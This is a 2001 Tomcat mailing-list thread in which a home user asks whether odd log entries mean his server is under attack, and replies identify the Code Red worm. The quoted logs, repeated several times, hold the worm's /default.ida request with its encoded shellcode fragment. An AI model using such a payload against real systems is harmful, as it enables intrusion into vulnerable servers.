> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27Connection: closeVia: 1.0
> <STIX>HHCE3X-Forward
> ed-For: 202.156.138.27
>
> 2001-08-05 19:55:27 - Ctx( ): 404 R( + /default.ida + null) null
> 2001-08-05 20:10:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:23:28 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:29:41 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:52:17 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:11:37 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:14:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:16:17 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:22:47 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:25:25 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:29:39 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:43:10 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:52:23 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:56:15 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:58:14 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 22:08:40 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
Re: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by "Sunny L.S. Chan (DLRM)" <su...@deliriumctouch.com>.
Hi guys I have checked the earlier posts and its the code-red worm thing.
Please ignore my previous question...
Thankx and regards
Kas
----- Original Message -----
From: "Kasnol (2001)" <ka...@hotmail.com>
To: <to...@jakarta.apache.org>
Sent: Sunday, August 05, 2001 10:32 PM
Subject: Is someone attempting to hack my server's tomcat 3.2.3?
> Hello all,
>
> I am using tomcat 3.2.3, windows 2000 professional at my home, upon
> occasional inspection of my tomcat log, an intresting, strange error is
> observed and enclosed below. I only can caputure 200 lines from my log
> screen, but below is the best bit of the tomcat output. The full version
is
> appended below to my message:
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27
> Connection: closeVia: 1.0 <STIX>HHCE3X-Forwarded-For: 202.156.138.27
>
> I can tell that someone is trying to access via GET method, and
> default.ida(?) or is it downloading somestuff somewhere in the net?
>
> I believe it can be somehow related to the recent worm scare at win2k.
> Is someone trying to implant a worm in my computer, or is this something
> tomcat, win2k, is vulnerable to ?
> I haven't seen anything wrong with my computer yet... but I guess I should
> start a full visurs scan
>
> Thankx!
> Any help/light is appreciated
> Regards
> Kas
>
> /***************************** Log Description
***************************/
> 2001-08-05 19:53:07 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27Connection: closeVia: 1.0
> <STIX>HHCE3X-Forward
> ed-For: 202.156.138.27
>
> 2001-08-05 19:55:27 - Ctx( ): 404 R( + /default.ida + null) null
> 2001-08-05 20:10:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:23:28 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:29:41 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:52:17 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:11:37 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:14:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:16:17 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:22:47 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:25:25 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:29:39 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:43:10 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:52:23 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:56:15 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:58:14 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 22:08:40 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
RE: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by Jeff Rancier <je...@softechnics.com>.
I am seeing similar messages.
-----Original Message-----
From: Kasnol (2001) [mailto:kasnol2001@hotmail.com]
Sent: Sunday, August 05, 2001 10:32 AM
To: tomcat-user@jakarta.apache.org
Subject: Is someone attempting to hack my server's tomcat 3.2.3?
Hello all,
I am using tomcat 3.2.3, windows 2000 professional at my home, upon
occasional inspection of my tomcat log, an intresting, strange error is
observed and enclosed below. I only can caputure 200 lines from my log
screen, but below is the best bit of the tomcat output. The full version is
appended below to my message:
Parse error, missing : in ccept: */*
t
Full GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xmlHOST:www.worm.com Accept: */*
trol: bypass-client=202.156.138.27
Connection: closeVia: 1.0 <STIX>HHCE3X-Forwarded-For: 202.156.138.27
I can tell that someone is trying to access via GET method, and
default.ida(?) or is it downloading somestuff somewhere in the net?
I believe it can be somehow related to the recent worm scare at win2k.
Is someone trying to implant a worm in my computer, or is this something
tomcat, win2k, is vulnerable to ?
I haven't seen anything wrong with my computer yet... but I guess I should
start a full visurs scan
Thankx!
Any help/light is appreciated
Regards
Kas
/***************************** Log Description ***************************/
2001-08-05 19:53:07 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
Parse error, missing : in ccept: */*
t
Full GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xmlHOST:www.worm.com Accept: */*
trol: bypass-client=202.156.138.27Connection: closeVia: 1.0
<STIX>HHCE3X-Forward
ed-For: 202.156.138.27
2001-08-05 19:55:27 - Ctx( ): 404 R( + /default.ida + null) null
2001-08-05 20:10:54 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:23:28 - ContextManager: Error reading request, ignored -
java.lang
